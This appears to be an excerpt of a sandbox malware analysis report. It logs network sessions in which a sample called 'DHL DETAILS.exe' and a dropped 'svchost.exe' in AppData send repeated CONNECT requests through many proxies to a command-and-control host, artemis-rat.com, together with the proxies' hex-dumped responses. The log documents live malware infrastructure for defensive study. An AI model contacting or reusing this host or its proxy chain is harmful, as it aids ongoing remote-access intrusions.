                                                                                    Mar 9, 2024 13:14:14.833111048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.677006960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.601267099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:23.567655087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.248676062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    21192.168.2.54982431.207.38.66806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.146119118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.825834990 CET408INHTTP/1.1 405 Method Not Allowed
                                                                                    Date: Sat, 09 Mar 2024 12:14:12 GMT
                                                                                    Server: Apache
                                                                                    Allow: OPTIONS,HEAD,GET,POST
                                                                                    Content-Length: 224
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 43 4f 4e 4e 45 43 54 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method CONNECT is not allowed for this URL.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    22192.168.2.54982043.155.130.182156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.160240889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    23192.168.2.549822120.76.42.20988886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.179724932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    24192.168.2.54982791.134.140.160328966352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.217437029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.958089113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    25192.168.2.549898172.67.181.197806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.221848965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.376121998 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:12 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    26192.168.2.549847185.104.112.62806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.229953051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.573270082 CET799INHTTP/1.1 500 Internal Server Error
                                                                                    Date: Sat, 09 Mar 2024 12:14:12 GMT
                                                                                    Server: Apache/2.4.56 (Debian)
                                                                                    Content-Length: 607
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 71 73 68 6e 40 6d 61 69 6c 2e 72 75 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at qshn@mail.ru to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.56 (Debian) Server at artemis-rat.com Port 443</address></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    27192.168.2.549868155.185.15.5631286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.232645988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.614360094 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    28192.168.2.549874198.12.255.19368216352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.235133886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.754981041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.380042076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.614347935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.224272966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.724297047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:22.223916054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:27.161186934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.146536112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    29192.168.2.549838103.49.202.250806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.242485046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.158482075 CET327INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:27 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    30192.168.2.549879154.205.152.9690806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.243187904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.452620029 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    31192.168.2.549872185.158.114.14256976352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.249694109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    32192.168.2.549926172.67.255.224806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.267153978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.421468973 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:12 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    33192.168.2.549910104.37.135.14541456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.282445908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    34192.168.2.549956104.19.83.128806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.317121983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.471818924 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:12 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    35192.168.2.54993091.134.140.160489626352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.318607092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    36192.168.2.54990072.195.114.16941456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.327997923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    37192.168.2.54988827.96.235.171806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.339598894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    38192.168.2.549875110.12.211.140806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.341336966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    39192.168.2.549921174.77.111.19641456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.362997055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    40192.168.2.55012243.153.175.434436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.363274097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    41192.168.2.55012543.153.175.434436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.370575905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    42192.168.2.54973594.131.63.1205837843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.372073889 CET1260INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/6.0.0-20220501-re899e0c27
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:12 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 3670
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    Cache-Status: ezproxies.com
                                                                                    Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)
                                                                                    Connection: keep-alive
